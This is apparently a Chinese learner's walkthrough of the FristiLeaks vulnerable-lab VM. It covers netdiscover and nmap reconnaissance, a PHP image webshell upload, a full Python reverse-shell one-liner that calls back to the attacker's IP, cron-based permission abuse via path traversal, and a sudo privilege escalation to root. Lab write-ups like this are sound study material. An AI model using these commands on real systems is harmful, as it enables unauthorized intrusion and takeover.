记第二次面向wp的FirstLeaks靶场实操

怎么说呢，总的打下来，这个靶场相对来说更接近于ctf一点。

开始。

1.信息收集

确定靶机地址。

详细用法：

-i device (网卡设备) 嗅探和注入数据包的网络接口。如果未指定接口，则将使用第一个可用的网卡接口(可用ifconfig命令查看)。

-r range (IP地址范围) 扫描给定范围而不是自动扫描。有效范围值区域例如：192.168.0.0/24,192.168.0.0/16或 192.168.0.0/8。目前，可接受的范围只有/8,/16和/24.(/8,/16,/24代表掩码)。

-l file (给定文件列表) 扫描包含在给定文件中的范围,每行必须只包含一个范围。

-p (passive:被动模式) 启用被动模式。在被动模式下，netdiscover不会发送任何内容,而只会嗅探。

-m file (给定文件列表) 扫描已知MAC和主机名的列表。

-F filter (过滤器) 自定义pcap过滤器表达式(默认值:"arp"，过滤器表达式可以自己定义)。

-s time (时间) 每次ARP请求注入之间的睡眠给定时间(指定等待时间,以毫秒为单位)。(默认1)

-n node (节点) 用于扫描的源IP的最后一个IP八位字节(八位二进制).如果已使用默认主机(x.x.x.67)，您可以更改它。(允许范围是2到253,默认67)

-c count (计数,发包数量) 发送每个ARP请求的次数。对于有数据包丢失的网络很有用，因此它将扫描每个主机的给定时间.(默认1)

-d 忽略主目录中的配置文件(仅适用于自动扫描和快速模式)。这将使用默认范围和IP进行自动扫描和快速模式。有关配置文件的信息,请参见下文。

-f 启用快速模式扫描。这只会扫描每个网络上的 .1、.100 和 .254，此模式在搜索正在使用的范围时很有用，找到此类范围后，您可以进行特定范围扫描以查找在线主机。

-P 生成适合重定向到文件或由另一个程序解析的输出，而不是使用交互模式。启用此选项，netdiscover将在扫描给定范围后停止(输出一个能让另一个程序解析的格式)。

-L 与-P类似，但在主动扫描后继续执行程序以被动捕获ARP数据包。

-N 不打印标题。仅在启用-P或-L时有效。

netdiscover -i eth0 -r 192.168.107.0/24

确定靶机ip地址。

端口扫描

nmap用SYN方法扫端口发现一个80端口。

然后基于端口重扫。

扫出来robots.txt文件，下面顺便展示了robots.txt下有什么。

那就进网去看看。

网站检查

发现三个子目录里都是这张图:"这不是你要找的url”。

说明应该是要我们去找url。

找了半天没找到。

最后看了wp，说是ip后加.....

属于是肯尼迪出的题了。

进去之后是这样的，要我们登录，首先想到爆破和post注入。

打开bp抓包然后放进sqlmap里先注入。

发现没结果。

那就再看看网页还有什么东西。

查看源码发现一个eezeepz的名字，一个base64编码。

以图片形式用火狐查看

data:img/png;base64，+base64编码

好像是个密码，那前面那个ez可能就是用户名。

2.漏洞利用

进去了，这里有个文件上传漏洞,说是要上传png,gif,jpg。

那就写个图片马上去，说是传到了uploads上，那就用这个目录打开我们的马。

要养成习惯不管写什么马都多跟一个phpinfo();

因为可以第一时间知道图片马是否成功。

现在看来是成功了。

那就可以反弹shell(为什么标红是因为不会，还得学，这个是看了教程然后看了wp才会的）。

python -c 'import  socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.107.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

拿到权限之后去eezeepz的目录下查看发现一个notes。 

cat一下。

歌词大意：

哟EZ，

我让你可以做一些自动检查，
但我只允许您访问 /usr/bin/* 系统二进制文件。我做了
但是，将一些额外的经常需要的命令复制到我的homedir：

chmod， df， cat， echo， ps， grep， egrep

这样你就可以使用它们从 /home/admin/

不要忘记为每个二进制文件指定完整路径！

只需在 /tmp/ 中放入一个名为“runthis”的文件，每行一个命令即可。这
输出转到 /tmp/ 中的文件“cronresult”。它应该
使用“我的帐户”权限运行每分钟。

简单编写

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis

 运行之后发现home目录的权限变了。

下面有两个加密后的文件，还有一个加密脚本。

看一下脚本。

那就解一下。

解出来是这个。

加上在home下面我们发现了三个用户。

有个fristigod，那就让用户变成fristigod，密码应该是lettherebefristi！。

进去了，查看权限。

发现有个文件是通过这个可执行文件可以获得全权。

然后看了wp说是。

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom su -

ok了。 

3.总结

1.图片马我原来用的是get方法是传参，但是bash去reshell的时候一直不行，就想着用post，结果还是不行，后来用的python一下就好了，不知道咋回事。
2.linux系统还是不太熟，有些时候代码真不知道怎么写。

3.还是没有养成记笔记的好习惯。

总的来说这个靶场虽然和打起来和ctf差不多，但是费神，也是第一次接触到反弹shell这个东西，还得学吧只能说。